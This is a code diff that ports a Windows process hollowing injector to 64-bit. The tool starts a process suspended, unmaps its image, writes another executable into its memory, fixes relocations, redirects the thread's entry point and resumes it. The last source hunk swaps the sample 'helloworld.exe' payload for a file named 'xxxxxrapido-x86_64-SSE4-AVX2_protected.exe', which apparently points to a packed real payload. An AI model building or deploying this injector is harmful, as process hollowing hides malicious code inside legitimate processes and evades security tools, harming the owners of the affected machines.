-	PVOID                   LoaderLock;
-	ULONG                   OSMajorVersion;
-	ULONG                   OSMinorVersion;
-	ULONG                   OSBuildNumber;
-	ULONG                   OSPlatformId;
-	ULONG                   ImageSubSystem;
-	ULONG                   ImageSubSystemMajorVersion;
-	ULONG                   ImageSubSystemMinorVersion;
-	ULONG                   GdiHandleBuffer[0x22];
-	ULONG                   PostProcessInitRoutine;
-	ULONG                   TlsExpansionBitmap;
-	BYTE                    TlsExpansionBitmapBits[0x80];
-	ULONG                   SessionId;
+        BOOLEAN                 InheritedAddressSpace;
+        BOOLEAN                 ReadImageFileExecOptions;
+        BOOLEAN                 BeingDebugged;
+        BOOLEAN                 Spare;
+        HANDLE                  Mutant;
+        PVOID                   ImageBaseAddress;
+        PPEB_LDR_DATA           LoaderData;
+        PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
+        PVOID                   SubSystemData;
+        PVOID                   ProcessHeap;
+        PVOID                   FastPebLock;
+        PPEBLOCKROUTINE         FastPebLockRoutine;
+        PPEBLOCKROUTINE         FastPebUnlockRoutine;
+        ULONG                   EnvironmentUpdateCount;
+        PVOID*                  KernelCallbackTable;
+        PVOID                   EventLogSection;
+        PVOID                   EventLog;
+        PPEB_FREE_BLOCK         FreeList;
+        ULONG                   TlsExpansionCounter;
+        PVOID                   TlsBitmap;
+        ULONG                   TlsBitmapBits[0x2];
+        PVOID                   ReadOnlySharedMemoryBase;
+        PVOID                   ReadOnlySharedMemoryHeap;
+        PVOID*                  ReadOnlyStaticServerData;
+        PVOID                   AnsiCodePageData;
+        PVOID                   OemCodePageData;
+        PVOID                   UnicodeCaseTableData;
+        ULONG                   NumberOfProcessors;
+        ULONG                   NtGlobalFlag;
+        BYTE                    Spare2[0x4];
+        LARGE_INTEGER           CriticalSectionTimeout;
+        ULONG                   HeapSegmentReserve;
+        ULONG                   HeapSegmentCommit;
+        ULONG                   HeapDeCommitTotalFreeThreshold;
+        ULONG                   HeapDeCommitFreeBlockThreshold;
+        ULONG                   NumberOfHeaps;
+        ULONG                   MaximumNumberOfHeaps;
+        PVOID*                  *ProcessHeaps;
+        PVOID                   GdiSharedHandleTable;
+        PVOID                   ProcessStarterHelper;
+        PVOID                   GdiDCAttributeList;
+        PVOID                   LoaderLock;
+        ULONG                   OSMajorVersion;
+        ULONG                   OSMinorVersion;
+        ULONG                   OSBuildNumber;
+        ULONG                   OSPlatformId;
+        ULONG                   ImageSubSystem;
+        ULONG                   ImageSubSystemMajorVersion;
+        ULONG                   ImageSubSystemMinorVersion;
+        ULONG                   GdiHandleBuffer[0x22];
+        ULONG                   PostProcessInitRoutine;
+        ULONG                   TlsExpansionBitmap;
+        BYTE                    TlsExpansionBitmapBits[0x80];
+        ULONG                   SessionId;
 } PEB, *PPEB;
 
 typedef struct BASE_RELOCATION_BLOCK {
-	DWORD PageAddress;
-	DWORD BlockSize;
+        DWORD PageAddress;
+        DWORD BlockSize;
 } BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;
 
 typedef struct BASE_RELOCATION_ENTRY {
-	USHORT Offset : 12;
-	USHORT Type : 4;
+        USHORT Offset : 12;
+        USHORT Type : 4;
 } BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;
 
-#define CountRelocationEntries(dwBlockSize)		\
-	(dwBlockSize -								\
-	sizeof(BASE_RELOCATION_BLOCK)) /			\
-	sizeof(BASE_RELOCATION_ENTRY)
+#define CountRelocationEntries(dwBlockSize)                             \
+        ((dwBlockSize - sizeof(BASE_RELOCATION_BLOCK)) /                \
+        sizeof(BASE_RELOCATION_ENTRY))
+
+#ifdef _WIN64
+using IMAGE_NT_HEADERS_T = IMAGE_NT_HEADERS64;
+using PIMAGE_NT_HEADERS_T = PIMAGE_NT_HEADERS64;
+using IMAGE_THUNK_DATA_T = IMAGE_THUNK_DATA64;
+using PIMAGE_THUNK_DATA_T = PIMAGE_THUNK_DATA64;
+#else
+using IMAGE_NT_HEADERS_T = IMAGE_NT_HEADERS32;
+using PIMAGE_NT_HEADERS_T = PIMAGE_NT_HEADERS32;
+using IMAGE_THUNK_DATA_T = IMAGE_THUNK_DATA32;
+using PIMAGE_THUNK_DATA_T = PIMAGE_THUNK_DATA32;
+#endif
+
+struct LOADED_IMAGE_EX {
+        std::vector<BYTE> RawData;
+        PIMAGE_NT_HEADERS_T FileHeader;
+        WORD NumberOfSections;
+        PIMAGE_SECTION_HEADER Sections;
+};
+
+using PLOADED_IMAGE_EX = LOADED_IMAGE_EX*;
 
 inline PEB* GetPEB()
 {
-	__asm mov eax, dword ptr fs:0x30;
+#ifdef _WIN64
+        return reinterpret_cast<PEB*>(__readgsqword(0x60));
+#else
+        return reinterpret_cast<PEB*>(__readfsdword(0x30));
+#endif
 }
 
-inline PIMAGE_NT_HEADERS32 GetNTHeaders(DWORD dwImageBase)
+inline PIMAGE_NT_HEADERS_T GetNTHeaders(uintptr_t dwImageBase)
 {
-	return (PIMAGE_NT_HEADERS32)(dwImageBase + 
-		((PIMAGE_DOS_HEADER)dwImageBase)->e_lfanew);
+        return reinterpret_cast<PIMAGE_NT_HEADERS_T>(dwImageBase +
+                reinterpret_cast<PIMAGE_DOS_HEADER>(dwImageBase)->e_lfanew);
 }
 
-inline PLOADED_IMAGE GetLoadedImage(DWORD dwImageBase)
+inline PLOADED_IMAGE_EX GetLoadedImage(uintptr_t dwImageBase)
 {
-	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)dwImageBase;
-	PIMAGE_NT_HEADERS32 pNTHeaders = GetNTHeaders(dwImageBase);
+        auto pDosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(dwImageBase);
 
-	PLOADED_IMAGE pImage = new LOADED_IMAGE();
+        auto pImage = new LOADED_IMAGE_EX();
+        pImage->FileHeader = reinterpret_cast<PIMAGE_NT_HEADERS_T>(dwImageBase + pDosHeader->e_lfanew);
+        pImage->NumberOfSections = pImage->FileHeader->FileHeader.NumberOfSections;
+        pImage->Sections = reinterpret_cast<PIMAGE_SECTION_HEADER>(dwImageBase + pDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS_T));
 
-	pImage->FileHeader = 
-		(PIMAGE_NT_HEADERS32)(dwImageBase + pDosHeader->e_lfanew);
-
-	pImage->NumberOfSections = 
-		pImage->FileHeader->FileHeader.NumberOfSections;
-
-	pImage->Sections = 
-		(PIMAGE_SECTION_HEADER)(dwImageBase + pDosHeader->e_lfanew + 
-		sizeof(IMAGE_NT_HEADERS32));
-
-	return pImage;
+        return pImage;
 }
 
-inline char* GetDLLName(DWORD dwImageBase, 
-						IMAGE_IMPORT_DESCRIPTOR ImageImportDescriptor)
+inline char* GetDLLName(uintptr_t dwImageBase,
+                                                IMAGE_IMPORT_DESCRIPTOR ImageImportDescriptor)
 {
-	return (char*)(dwImageBase + ImageImportDescriptor.Name);
+        return reinterpret_cast<char*>(dwImageBase + ImageImportDescriptor.Name);
 }
 
-inline IMAGE_DATA_DIRECTORY GetImportDirectory(PIMAGE_NT_HEADERS32 pFileHeader)
+inline IMAGE_DATA_DIRECTORY GetImportDirectory(PIMAGE_NT_HEADERS_T pFileHeader)
 {
-	return pFileHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
+        return pFileHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
 }
 
-inline PIMAGE_IMPORT_DESCRIPTOR GetImportDescriptors(PIMAGE_NT_HEADERS32 pFileHeader,
-													 IMAGE_DATA_DIRECTORY ImportDirectory)
+inline PIMAGE_IMPORT_DESCRIPTOR GetImportDescriptors(PIMAGE_NT_HEADERS_T pFileHeader,
+                                                                                                         IMAGE_DATA_DIRECTORY ImportDirectory)
 {
-	return (PIMAGE_IMPORT_DESCRIPTOR)(pFileHeader->OptionalHeader.ImageBase + 
-		ImportDirectory.VirtualAddress);
+        return reinterpret_cast<PIMAGE_IMPORT_DESCRIPTOR>(pFileHeader->OptionalHeader.ImageBase +
+                ImportDirectory.VirtualAddress);
 }
 
-inline PIMAGE_THUNK_DATA32 GetILT(DWORD dwImageBase, 
-								  IMAGE_IMPORT_DESCRIPTOR ImageImportDescriptor)
+inline PIMAGE_THUNK_DATA_T GetILT(uintptr_t dwImageBase,
+                                                                  IMAGE_IMPORT_DESCRIPTOR ImageImportDescriptor)
 {
-	return (PIMAGE_THUNK_DATA32)(dwImageBase + ImageImportDescriptor.OriginalFirstThunk);
+        return reinterpret_cast<PIMAGE_THUNK_DATA_T>(dwImageBase + ImageImportDescriptor.OriginalFirstThunk);
 }
 
-inline PIMAGE_THUNK_DATA32 GetIAT(DWORD dwImageBase, 
-								  IMAGE_IMPORT_DESCRIPTOR ImageImportDescriptor)
+inline PIMAGE_THUNK_DATA_T GetIAT(uintptr_t dwImageBase,
+                                                                  IMAGE_IMPORT_DESCRIPTOR ImageImportDescriptor)
 {
-	return (PIMAGE_THUNK_DATA32)(dwImageBase + ImageImportDescriptor.FirstThunk);
+        return reinterpret_cast<PIMAGE_THUNK_DATA_T>(dwImageBase + ImageImportDescriptor.FirstThunk);
 }
 
-inline PIMAGE_IMPORT_BY_NAME GetImportByName(DWORD dwImageBase, 
-											 IMAGE_THUNK_DATA32 itdImportLookup)
+inline PIMAGE_IMPORT_BY_NAME GetImportByName(uintptr_t dwImageBase,
+                                                                                         IMAGE_THUNK_DATA_T itdImportLookup)
 {
-	return (PIMAGE_IMPORT_BY_NAME)(dwImageBase + itdImportLookup.u1.AddressOfData);
+        return reinterpret_cast<PIMAGE_IMPORT_BY_NAME>(dwImageBase + static_cast<uintptr_t>(itdImportLookup.u1.AddressOfData));
 }
-
 
 extern std::map<PWSTR, std::vector<DWORD>> gCodeChecksums;
 
@@ -231,16 +248,16 @@ void SetInitialLdrCodeChecksums(PLDR_MODULE pLdrModule, DWORD dwIndex, PVOID pPa
 void ValidateLdrCodeChecksums(PLDR_MODULE pLdrModule, DWORD dwIndex, PVOID pParams);
 
 typedef struct _IAT_BACKUP_INFO {
-	DWORD BackupLength;
-	DWORD*** IATBackup;
+        DWORD BackupLength;
+        DWORD*** IATBackup;
 } IAT_BACKUP_INFO, *PIAT_BACKUP_INFO;
 
-DWORD** BackupIAT(DWORD dwImageBase);
+DWORD** BackupIAT(uintptr_t dwImageBase);
 
-void RepairIAT(DWORD dwImageBase, DWORD** pIATBackup);
+void RepairIAT(uintptr_t dwImageBase, DWORD** pIATBackup);
 
-DWORD FindRemotePEB(HANDLE hProcess);
+uintptr_t FindRemotePEB(HANDLE hProcess);
 
 PEB* ReadRemotePEB(HANDLE hProcess);
 
-PLOADED_IMAGE ReadRemoteImage(HANDLE hProcess, LPCVOID lpImageBaseAddress);
+PLOADED_IMAGE_EX ReadRemoteImage(HANDLE hProcess, LPCVOID lpImageBaseAddress);

--- a/sourcecode/ProcessHollowing/ProcessHollowing.cpp
+++ b/sourcecode/ProcessHollowing/ProcessHollowing.cpp
@@ -2,43 +2,48 @@
 
 #include "stdafx.h"
 #include <windows.h>
+#include <cstdint>
+#include <vector>
 #include "internals.h"
 #include "pe.h"
 
 void CreateHollowedProcess(char* pDestCmdLine, char* pSourceFile)
 {
 
-	printf("Creating process\r\n");
+printf("Creating process\r\n");
 
-	LPSTARTUPINFOA pStartupInfo = new STARTUPINFOA();
-	LPPROCESS_INFORMATION pProcessInfo = new PROCESS_INFORMATION();
-	
-	CreateProcessA
-	(
-		0,
-		pDestCmdLine,		
-		0, 
+STARTUPINFOA startupInfo;
+ZeroMemory(&startupInfo, sizeof(startupInfo));
+startupInfo.cb = sizeof(startupInfo);
+PROCESS_INFORMATION processInfo;
+ZeroMemory(&processInfo, sizeof(processInfo));
+
+CreateProcessA
+(
+0,
+pDestCmdLine,
+0,
 		0, 
 		0, 
 		CREATE_SUSPENDED, 
 		0, 
 		0, 
-		pStartupInfo, 
-		pProcessInfo
-	);
+&startupInfo,
+&processInfo
+);
 
-	if (!pProcessInfo->hProcess)
-	{
-		printf("Error creating process\r\n");
+if (!processInfo.hProcess)
+{
+printf("Error creating process\r\n");
 
-		return;
-	}
+return;
+}
 
-	PPEB pPEB = ReadRemotePEB(pProcessInfo->hProcess);
+PPEB pPEB = ReadRemotePEB(processInfo.hProcess);
 
-	PLOADED_IMAGE pImage = ReadRemoteImage(pProcessInfo->hProcess, pPEB->ImageBaseAddress);
+ReadRemoteImage(processInfo.hProcess, pPEB->ImageBaseAddress);
 
-	printf("Opening source image\r\n");
+printf("Opening source image\r\n");
 
 	HANDLE hFile = CreateFileA
 	(
@@ -57,14 +62,14 @@ void CreateHollowedProcess(char* pDestCmdLine, char* pSourceFile)
 		return;
 	}
 
-	DWORD dwSize = GetFileSize(hFile, 0);
-	PBYTE pBuffer = new BYTE[dwSize];
-	DWORD dwBytesRead = 0;
-	ReadFile(hFile, pBuffer, dwSize, &dwBytesRead, 0);
-	CloseHandle(hFile);
-	PLOADED_IMAGE pSourceImage = GetLoadedImage((DWORD)pBuffer);
+DWORD dwSize = GetFileSize(hFile, 0);
+std::vector<BYTE> fileBuffer(dwSize);
+DWORD dwBytesRead = 0;
+ReadFile(hFile, fileBuffer.data(), dwSize, &dwBytesRead, 0);
+CloseHandle(hFile);
+PLOADED_IMAGE_EX pSourceImage = GetLoadedImage(reinterpret_cast<uintptr_t>(fileBuffer.data()));
 
-	PIMAGE_NT_HEADERS32 pSourceHeaders = GetNTHeaders((DWORD)pBuffer);
+PIMAGE_NT_HEADERS_T pSourceHeaders = GetNTHeaders(reinterpret_cast<uintptr_t>(fileBuffer.data()));
 
 	printf("Unmapping destination section\r\n");
 
@@ -75,11 +80,11 @@ void CreateHollowedProcess(char* pDestCmdLine, char* pSourceFile)
 	_NtUnmapViewOfSection NtUnmapViewOfSection =
 		(_NtUnmapViewOfSection)fpNtUnmapViewOfSection;
 
-	DWORD dwResult = NtUnmapViewOfSection
-	(
-		pProcessInfo->hProcess, 
-		pPEB->ImageBaseAddress
-	);
+DWORD dwResult = NtUnmapViewOfSection
+(
+processInfo.hProcess,
+pPEB->ImageBaseAddress
+);
 
 	if (dwResult)
 	{
@@ -89,80 +94,81 @@ void CreateHollowedProcess(char* pDestCmdLine, char* pSourceFile)
 
 	printf("Allocating memory\r\n");
 
-	PVOID pRemoteImage = VirtualAllocEx
-	(
-		pProcessInfo->hProcess,
-		pPEB->ImageBaseAddress,
-		pSourceHeaders->OptionalHeader.SizeOfImage,
-		MEM_COMMIT | MEM_RESERVE,
-		PAGE_EXECUTE_READWRITE
-	);
+PVOID pRemoteImage = VirtualAllocEx
+(
+processInfo.hProcess,
+pPEB->ImageBaseAddress,
+static_cast<SIZE_T>(pSourceHeaders->OptionalHeader.SizeOfImage),
+MEM_COMMIT | MEM_RESERVE,
+PAGE_EXECUTE_READWRITE
+);
 
-	if (!pRemoteImage)
-	{
-		printf("VirtualAllocEx call failed\r\n");
-		return;
-	}
+if (!pRemoteImage)
+{
+printf("VirtualAllocEx call failed\r\n");
+return;
+}
 
-	DWORD dwDelta = (DWORD)pPEB->ImageBaseAddress -
-		pSourceHeaders->OptionalHeader.ImageBase;
+UINT_PTR remoteBase = reinterpret_cast<UINT_PTR>(pPEB->ImageBaseAddress);
+UINT_PTR sourceBase = static_cast<UINT_PTR>(pSourceHeaders->OptionalHeader.ImageBase);
+LONG_PTR dwDelta = static_cast<LONG_PTR>(remoteBase) - static_cast<LONG_PTR>(sourceBase);
 
-	printf
-	(
-		"Source image base: 0x%p\r\n"
-		"Destination image base: 0x%p\r\n",
-		pSourceHeaders->OptionalHeader.ImageBase,
-		pPEB->ImageBaseAddress
-	);
+printf
+(
+"Source image base: 0x%p\r\n"
+"Destination image base: 0x%p\r\n",
+reinterpret_cast<PVOID>(sourceBase),
+pPEB->ImageBaseAddress
+);
 
-	printf("Relocation delta: 0x%p\r\n", dwDelta);
+printf("Relocation delta: 0x%Ix\r\n", dwDelta);
 
-	pSourceHeaders->OptionalHeader.ImageBase = (DWORD)pPEB->ImageBaseAddress;
+pSourceHeaders->OptionalHeader.ImageBase = static_cast<decltype(pSourceHeaders->OptionalHeader.ImageBase)>(remoteBase);
 
-	printf("Writing headers\r\n");
+printf("Writing headers\r\n");
 
-	if (!WriteProcessMemory
-	(
-		pProcessInfo->hProcess, 				
-		pPEB->ImageBaseAddress, 
-		pBuffer, 
-		pSourceHeaders->OptionalHeader.SizeOfHeaders, 
-		0
-	))
-	{
-		printf("Error writing process memory\r\n");
+if (!WriteProcessMemory
+(
+processInfo.hProcess,
+pPEB->ImageBaseAddress,
+fileBuffer.data(),
+static_cast<SIZE_T>(pSourceHeaders->OptionalHeader.SizeOfHeaders),
+0
+))
+{
+printf("Error writing process memory\r\n");
 
-		return;
-	}
+return;
+}
 
-	for (DWORD x = 0; x < pSourceImage->NumberOfSections; x++)
-	{
-		if (!pSourceImage->Sections[x].PointerToRawData)
-			continue;
+for (DWORD x = 0; x < pSourceImage->NumberOfSections; x++)
+{
+if (!pSourceImage->Sections[x].PointerToRawData)
+continue;
 
-		PVOID pSectionDestination = 
-			(PVOID)((DWORD)pPEB->ImageBaseAddress + pSourceImage->Sections[x].VirtualAddress);
+PVOID pSectionDestination =
+reinterpret_cast<PVOID>(remoteBase + pSourceImage->Sections[x].VirtualAddress);
 
-		printf("Writing %s section to 0x%p\r\n", pSourceImage->Sections[x].Name, pSectionDestination);
+printf("Writing %s section to 0x%p\r\n", pSourceImage->Sections[x].Name, pSectionDestination);
 
-		if (!WriteProcessMemory
-		(
-			pProcessInfo->hProcess,			
-			pSectionDestination,			
-			&pBuffer[pSourceImage->Sections[x].PointerToRawData],
-			pSourceImage->Sections[x].SizeOfRawData,
-			0
-		))
-		{
-			printf ("Error writing process memory\r\n");
-			return;
-		}
-	}	
+if (!WriteProcessMemory
+(
+processInfo.hProcess,
+pSectionDestination,
+&fileBuffer[pSourceImage->Sections[x].PointerToRawData],
+pSourceImage->Sections[x].SizeOfRawData,
+0
+))
+{
+printf ("Error writing process memory\r\n");
+return;
+}
+}
 
-	if (dwDelta)
-		for (DWORD x = 0; x < pSourceImage->NumberOfSections; x++)
-		{
-			char* pSectionName = ".reloc";		
+if (dwDelta)
+for (DWORD x = 0; x < pSourceImage->NumberOfSections; x++)
+{
+char* pSectionName = ".reloc";
 
 			if (memcmp(pSourceImage->Sections[x].Name, pSectionName, strlen(pSectionName)))
 				continue;
@@ -177,15 +183,15 @@ void CreateHollowedProcess(char* pDestCmdLine, char* pSourceFile)
 
 			while (dwOffset < relocData.Size)
 			{
-				PBASE_RELOCATION_BLOCK pBlockheader = 
-					(PBASE_RELOCATION_BLOCK)&pBuffer[dwRelocAddr + dwOffset];
+PBASE_RELOCATION_BLOCK pBlockheader =
+reinterpret_cast<PBASE_RELOCATION_BLOCK>(&fileBuffer[dwRelocAddr + dwOffset]);
 
 				dwOffset += sizeof(BASE_RELOCATION_BLOCK);
 
 				DWORD dwEntryCount = CountRelocationEntries(pBlockheader->BlockSize);
 
-				PBASE_RELOCATION_ENTRY pBlocks = 
-					(PBASE_RELOCATION_ENTRY)&pBuffer[dwRelocAddr + dwOffset];
+PBASE_RELOCATION_ENTRY pBlocks =
+reinterpret_cast<PBASE_RELOCATION_ENTRY>(&fileBuffer[dwRelocAddr + dwOffset]);
 
 				for (DWORD y = 0; y <  dwEntryCount; y++)
 				{
@@ -194,34 +200,38 @@ void CreateHollowedProcess(char* pDestCmdLine, char* pSourceFile)
 					if (pBlocks[y].Type == 0)
 						continue;
 
-					DWORD dwFieldAddress = 
-						pBlockheader->PageAddress + pBlocks[y].Offset;
+DWORD dwFieldAddress =
+pBlockheader->PageAddress + pBlocks[y].Offset;
 
-					DWORD dwBuffer = 0;
-					ReadProcessMemory
-					(
-						pProcessInfo->hProcess, 
-						(PVOID)((DWORD)pPEB->ImageBaseAddress + dwFieldAddress),
-						&dwBuffer,
-						sizeof(DWORD),
-						0
-					);
+if (pBlocks[y].Type != IMAGE_REL_BASED_HIGHLOW &&
+pBlocks[y].Type != IMAGE_REL_BASED_DIR64)
+{
+continue;
+}
 
-					//printf("Relocating 0x%p -> 0x%p\r\n", dwBuffer, dwBuffer - dwDelta);
+ULONG_PTR dwBuffer = 0;
+ReadProcessMemory
+(
+processInfo.hProcess,
+reinterpret_cast<PVOID>(remoteBase + dwFieldAddress),
+&dwBuffer,
+sizeof(dwBuffer),
+0
+);
 
-					dwBuffer += dwDelta;
+dwBuffer = static_cast<ULONG_PTR>(static_cast<LONGLONG>(dwBuffer) + dwDelta);
 
-					BOOL bSuccess = WriteProcessMemory
-					(
-						pProcessInfo->hProcess,
-						(PVOID)((DWORD)pPEB->ImageBaseAddress + dwFieldAddress),
-						&dwBuffer,
-						sizeof(DWORD),
-						0
-					);
+BOOL bSuccess = WriteProcessMemory
+(
+processInfo.hProcess,
+reinterpret_cast<PVOID>(remoteBase + dwFieldAddress),
+&dwBuffer,
+sizeof(dwBuffer),
+0
+);
 
-					if (!bSuccess)
-					{
+if (!bSuccess)
+{
 						printf("Error writing memory\r\n");
 						continue;
 					}
@@ -232,56 +242,64 @@ void CreateHollowedProcess(char* pDestCmdLine, char* pSourceFile)
 		}
 
 
-		DWORD dwBreakpoint = 0xCC;
+DWORD dwBreakpoint = 0xCC;
 
-		DWORD dwEntrypoint = (DWORD)pPEB->ImageBaseAddress +
-			pSourceHeaders->OptionalHeader.AddressOfEntryPoint;
+UINT_PTR dwEntrypoint = remoteBase +
+pSourceHeaders->OptionalHeader.AddressOfEntryPoint;
 
 #ifdef WRITE_BP
-		printf("Writing breakpoint\r\n");
+                printf("Writing breakpoint\r\n");
 
-		if (!WriteProcessMemory
-			(
-			pProcessInfo->hProcess, 
-			(PVOID)dwEntrypoint, 
-			&dwBreakpoint, 
-			4, 
-			0
-			))
+                if (!WriteProcessMemory
+                        (
+                        processInfo.hProcess,
+                        (PVOID)dwEntrypoint,
+                        &dwBreakpoint,
+                        4,
+                        0
+                        ))
 		{
 			printf("Error writing breakpoint\r\n");
 			return;
 		}
 #endif
 
-		LPCONTEXT pContext = new CONTEXT();
-		pContext->ContextFlags = CONTEXT_INTEGER;
+CONTEXT context = {0};
+#ifdef _WIN64
+context.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
+#else
+context.ContextFlags = CONTEXT_INTEGER;
+#endif
 
-		printf("Getting thread context\r\n");
+printf("Getting thread context\r\n");
 
-		if (!GetThreadContext(pProcessInfo->hThread, pContext))
-		{
-			printf("Error getting context\r\n");
-			return;
-		}
+if (!GetThreadContext(processInfo.hThread, &context))
+{
+printf("Error getting context\r\n");
+return;
+}
 
-		pContext->Eax = dwEntrypoint;			
+#ifdef _WIN64
+context.Rip = dwEntrypoint;
+#else
+context.Eax = static_cast<DWORD>(dwEntrypoint);
+#endif
 
-		printf("Setting thread context\r\n");
+printf("Setting thread context\r\n");
 
-		if (!SetThreadContext(pProcessInfo->hThread, pContext))
-		{
-			printf("Error setting context\r\n");
-			return;
-		}
+if (!SetThreadContext(processInfo.hThread, &context))
+{
+printf("Error setting context\r\n");
+return;
+}
 
-		printf("Resuming thread\r\n");
+printf("Resuming thread\r\n");
 
-		if (!ResumeThread(pProcessInfo->hThread))
-		{
-			printf("Error resuming thread\r\n");
-			return;
-		}
+if (!ResumeThread(processInfo.hThread))
+{
+printf("Error resuming thread\r\n");
+return;
+}
 
 		printf("Process hollowing complete\r\n");
 }

--- a/sourcecode/ProcessHollowing/ProcessHollowing.cpp
+++ b/sourcecode/ProcessHollowing/ProcessHollowing.cpp
@@ -309,7 +309,7 @@ int _tmain(int argc, _TCHAR* argv[])
 	char* pPath = new char[MAX_PATH];
 	GetModuleFileNameA(0, pPath, MAX_PATH);
 	pPath[strrchr(pPath, '\\') - pPath + 1] = 0;
-	strcat(pPath, "helloworld.exe");
+	strcat(pPath, "xxxxxrapido-x86_64-SSE4-AVX2_protected.exe");
 	
 	CreateHollowedProcess
 	(

--- a/sourcecode/ProcessHollowing/ProcessHollowing.vcproj
+++ b/sourcecode/ProcessHollowing/ProcessHollowing.vcproj
@@ -8,11 +8,14 @@
 	Keyword="Win32Proj"
 	TargetFrameworkVersion="196613"
 	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-	</Platforms>
+<Platforms>
+<Platform
+Name="Win32"
+/>
+<Platform
+Name="x64"
+/>
+</Platforms>
 	<ToolFiles>
 	</ToolFiles>
 	<Configurations>
@@ -86,9 +89,81 @@
 			<Tool
 				Name="VCPostBuildEventTool"
 			/>
-		</Configuration>
+</Configuration>
 		<Configuration
-			Name="Release|Win32"
+			Name="Debug|x64"
+			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+				TargetEnvironment="3"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="_DEBUG;_CONSOLE"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				TargetMachine="17"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+<Configuration
+Name="Release|Win32"
 			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
 			IntermediateDirectory="$(ConfigurationName)"
 			ConfigurationType="1"
@@ -160,8 +235,83 @@
 			<Tool
 				Name="VCPostBuildEventTool"
 			/>
+</Configuration>
+		<Configuration
+			Name="Release|x64"
+			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+				TargetEnvironment="3"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="2"
+				EnableIntrinsicFunctions="true"
+				PreprocessorDefinitions="NDEBUG;_CONSOLE"
+				RuntimeLibrary="2"
+				EnableFunctionLevelLinking="true"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="1"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="17"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
 		</Configuration>
-	</Configurations>
+</Configurations>
 	<References>
 	</References>
 	<Files>
@@ -190,7 +340,23 @@
 					/>
 				</FileConfiguration>
 				<FileConfiguration
+					Name="Debug|x64"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+				<FileConfiguration
 					Name="Release|Win32"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+				<FileConfiguration
+					Name="Release|x64"
 					>
 					<Tool
 						Name="VCCLCompilerTool"

--- a/sourcecode/ProcessHollowing/ProcessHollowing.vcxproj
+++ b/sourcecode/ProcessHollowing/ProcessHollowing.vcxproj
@@ -1,0 +1,189 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
